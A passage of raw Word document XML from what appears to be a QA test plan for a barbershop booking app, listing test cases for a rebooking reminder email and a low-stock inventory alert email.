            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3BA5512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NSF-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="50267DD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6FB6579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contains “miss” (we missed you)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="414AA4A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679A82A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BFC664A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B05C9E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NSF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="581EC39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2F430FB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heading says “We Missed You”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3ABEA35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3E8E165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C2A5599" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4CED1EC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NSF-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3FC3199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3ABA0A3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mentions the booked service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0E263DE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6C2114D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9625ECA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F22BD6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NSF-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="42C8E4B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2FFA570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includes “REBOOK NOW” CTA button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31EA9E7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10CED23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CEB1F9C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7DDB660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NSF-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="64E674B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81927B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Plain text contains </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WE MISSED </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>YOU</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7816568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0C023D0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F7AF4A5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7328921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NSF-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767A58B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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EA98FB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delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59FC0ED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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5859403b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35D31FE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bl>
    <w:p w14:paraId="2B084C16"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Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">We missed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rebook at Crown Cuts Barbershop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785BC26D" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1D8E2485">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="733ED903" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="tc-lsa-low-stock-alert"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TC-LSA — Low Stock Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D184D63"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Triggered when an inventory item transitions to low/out-of-stock state via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PATCH /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/inventory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="2915BEDF"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="385DAE33"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="7CF0AF31"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="387DF4BF"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5323064C"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="01B57352"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5ACAAE0C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="42483FB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LSA-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="68C0292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2EF71AA1"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="58C5501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249DF4F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A005B79" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C83DCC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LSA-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59BA612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5E2E670A"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3533E23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5597 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="227A544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E80CA42" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0AC1FA7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LSA-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4EB261F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2C6576E2"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4B8E856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334 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="359FCCC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8D107AD" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3DDC347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LSA-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43D6C2E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20FFFEC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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="17DE9AA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51DF912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8DD8B21" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="56201E4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LSA-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2936B75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3323DF1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BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="023168F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3C93B04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862866C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="362F2F7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LSA-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B3D47E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08FBD73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uses </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="407CF7B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1538A01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9B0EF2F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="36CB9E9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LSA-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3C8F2FD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5C2C0F8B"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="215D34A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3 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0FBA508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9849217" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13D4E69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LSA-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="699F2D4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1A98273A"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A25A54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13 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71425A0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E16BFC0" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0DE5443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LSA-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2F76ACE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6D2DE5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includes correct item count (“3 items”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="12A9C9E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16B3E2F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AF50C79" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19C6EE1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LSA-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FA78FF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5A4ABA6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includes shop name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FDD691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6C1489B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DABEF9F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="55EC5EB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LSA-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="67F972F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67BC05D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Subject does NOT start with emoji </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⚠</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="33398F2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Confirmed clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4234C66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79828C5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4814AC4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LSA-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C223A5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28261DC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shows red “OUT OF STOCK” badge for qty=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5951889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7F25AF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A06B976" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4360D72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LSA-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
